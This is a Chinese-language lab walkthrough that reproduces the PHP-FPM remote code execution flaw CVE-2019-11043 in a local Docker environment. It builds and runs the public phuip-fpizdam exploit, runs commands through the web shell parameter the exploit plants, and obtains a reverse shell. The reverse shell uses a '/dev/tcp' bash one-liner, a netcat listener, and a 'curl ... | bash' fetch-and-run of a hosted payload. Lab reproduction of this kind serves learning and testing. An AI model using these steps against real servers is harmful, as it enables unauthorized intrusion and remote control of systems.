前言
环境搭建
cd /php/CVE-2019-11043
docker-compose up -d
docker ps有两个容器
再访问8080端口下的index.php,出现hello world环境搭建成功
漏洞利用
exp需要go环境,使用以下命令安装go环境,这里是kali演示
# 安装go环境
apt install golang -y
go env -w GOPROXY=https://goproxy.cn # 代理地址换成国内
# 下载exp
git clone https://hub.fastgit.org/neex/phuip-fpizdam.git
cd phuip-fpizdam/
go get -v && go build # 编译
编译成功后,会多一个phuip-fpizdam
执行go run . http://127.0.0.1:8080/index.php
,如下图表示执行成功
进入docker执行cat /tmp/a
,exp创建了一个简单的一句话传参命令
访问http://127.0.0.1:8080/index.php?a=whoami
,多访问几遍即可成功执行命令
getshell
这里访问http://127.0.0.1:8080/index.php?a=bash -i >& /dev/tcp/192.168.127.132/4444 0>&1
,kali使用nc开启监听是不能反弹shell的。
正确的做法先输入nc -lvp 4444
,开启监听后
另外开一个终端输入以下命令
echo "bash -i >& /dev/tcp/192.168.127.132/4444 0>&1" > shell
python -m SimpleHTTPServer 8000
访问http://127.0.0.1:8080/index.php?a=curl 192.168.127.132:8000/shell |bash
,成功反弹shell